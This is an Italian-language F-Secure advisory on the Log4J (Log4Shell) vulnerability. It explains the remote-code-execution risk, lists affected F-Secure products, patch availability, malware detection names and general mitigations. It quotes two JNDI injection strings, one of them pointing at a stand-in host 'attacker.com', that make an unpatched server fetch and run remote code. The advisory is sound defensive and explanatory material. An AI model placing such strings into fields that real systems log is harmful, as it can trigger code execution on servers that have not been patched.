Una vulnerabilità nella libreria Log4J, scoperta venerdì 10 dicembre, sta scuotendo produttori di software e fornitori di servizi in tutto il mondo. La vulnerabilità nel metodo standardizzato per l'elaborazione dei messaggi di registro nel software da Minecraft di Microsoft alle piattaforme di e-commerce è già stata attaccata dagli aggressori.
È quasi impossibile descrivere il livello di rischio attualmente rappresentato dalle applicazioni vulnerabili. Se viene registrata una stringa di caratteri controllata dall'utente mirata alla vulnerabilità, la vulnerabilità può essere eseguita in remoto. In parole povere, un utente malintenzionato potrebbe sfruttare questa vulnerabilità per indurre il sistema di destinazione a recuperare ed eseguire codice da una posizione remota. Nella seconda fase, spetta all'attaccante cosa dovrebbe fare il codice dannoso.
Una “tempesta quasi perfetta”
Questa vulnerabilità mostra quanto sia difficile proteggere il software aziendale a più livelli. Il software obsoleto, comprese le versioni precedenti di Java, costringe molte aziende a sviluppare le proprie patch o impedisce loro di applicarle immediatamente. Un'altra complicazione nasce dalla sfida di applicare patch alle funzionalità di registrazione di Log4j in tempo reale, proprio quando la minaccia di attacchi è così alta e la registrazione è così importante.
Tutte le contromisure raccomandate dovrebbero essere implementate "immediatamente", scrive la Cybersecurity & Infrastructure Security Agency in un post sul blog.
Non c'è molto che i singoli utenti possano fare se non installare gli aggiornamenti ai vari servizi online non appena diventano disponibili. E questo dovrebbe accadere immediatamente. Le aziende e le imprese lavoreranno senza sosta per distribuire le patch proteggendo al contempo i propri sistemi. Successivamente, sarà importante determinare se nei sistemi interessati è in corso un incidente di sicurezza attivo.
Vulnerabilità quasi ovunque
Può essere più difficile trovare un'applicazione che non utilizzi la libreria Log4J piuttosto che una che la utilizzi. Questa ubiquità significa che gli aggressori possono cercare vulnerabilità quasi ovunque.
“Per favore, cambia il nome della tua Tesla o iPhone NON in ${jndi:ldap://url/a} a meno che tu non voglia un evento imprevisto", afferma Erka Koivunen, Chief Information Security Officer di F-Secure, scherzosamente.
L'utilizzo del linguaggio di formattazione di Log4J potrebbe attivare malware nelle applicazioni vulnerabili. Come sappiamo, solo la menzione di una frase come ${jndi:ldap://attacker.com/pwnyourserver} in una chat di Minecraft, ad esempio, può innescare una tempesta di sicurezza in Microsoft su un sistema senza patch.
I prodotti F-Secure sono interessati?
F-Secure ha stabilito che i seguenti prodotti sono interessati da questa vulnerabilità:
- Responsabile delle policy F-Secure
- Proxy F-Secure Policy Manager
- Proxy endpoint F-Secure
- Connettore F-Secure Elements
Entrambe le versioni Windows e Linux di questi prodotti sono interessate e devono essere aggiornate immediatamente.
Come posso applicare una patch al mio prodotto F-Secure?
Abbiamo sviluppato una patch di sicurezza per questa vulnerabilità. Notizie e aggiornamenti su questa vulnerabilità vengono continuamente pubblicati nella nostra pagina della community
Quale protezione offre F-Secure contro questa vulnerabilità?
F-Secure Endpoint Protection (EPP) viene costantemente aggiornato con i rilevamenti degli ultimi file di exploit locali, ma dati i molti modi in cui una vulnerabilità può essere sfruttata, questo copre solo una parte del problema.
I rilevamenti EPP, come al solito, riguardano qualsiasi carico utile visto nella fase post-sfruttamento. Al momento della stesura di questo documento, F-Secure ha effettuato i seguenti rilevamenti che coprono alcuni scenari di attacco gravi. Si tratta di payload dannosi che abbiamo osservato in relazione agli exploit Log4j.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Molti di questi rilevamenti sono disponibili in F-Secure EPP da mesi, il che significa che i clienti sono protetti in modo proattivo da questi payload.
Anche altri rilevamenti esistenti possono essere utili in quanto esistono diversi modi per sfruttare l'exploit. Questo elenco di rilevamenti utili verrà continuamente aggiornato con l'evolversi della situazione. Vedere le raccomandazioni generali nella sezione seguente per ulteriori azioni correttive.
In generale, quali azioni dovresti intraprendere con qualsiasi software, indipendentemente dal produttore?
- Limita l'accesso alla rete o limitalo a siti attendibili. Se il tuo sistema non può connettersi a Internet per ottenere il codice dannoso, l'attacco fallirà.
- Verificare regolarmente con i fornitori per informazioni su patch e altre correzioni per le vulnerabilità della sicurezza.
- F-Secure Elements Vulnerability Management può aiutare a identificare i sistemi vulnerabili.
- I prodotti F-Secure Elements Endpoint Protection o F-Secure Business Suite possono rilevare e correggere il software vulnerabile sul sistema in cui sono installati.
F-Secure tiene inoltre aggiornati tutti i clienti e gli utenti in ogni momento.
Altro su F-Secure.com
Informazioni su F-Secure Nessuno ha una visione migliore degli attacchi informatici reali di F-Secure. Colmiamo il divario tra rilevamento e risposta. Per fare ciò, sfruttiamo l'ineguagliabile competenza in materia di minacce di centinaia dei migliori consulenti tecnici del nostro settore, i dati provenienti da milioni di dispositivi che eseguono il nostro pluripremiato software e le continue innovazioni nell'intelligenza artificiale. Le principali banche, compagnie aeree e aziende si fidano del nostro impegno nella lotta contro le minacce informatiche più pericolose del mondo. Insieme alla nostra rete dei migliori partner di canale e oltre 200 fornitori di servizi, la nostra missione è fornire a tutti i nostri clienti una sicurezza informatica di livello aziendale su misura per le loro esigenze. Fondata nel 1988, F-Secure è quotata al NASDAQ OMX Helsinki Ltd.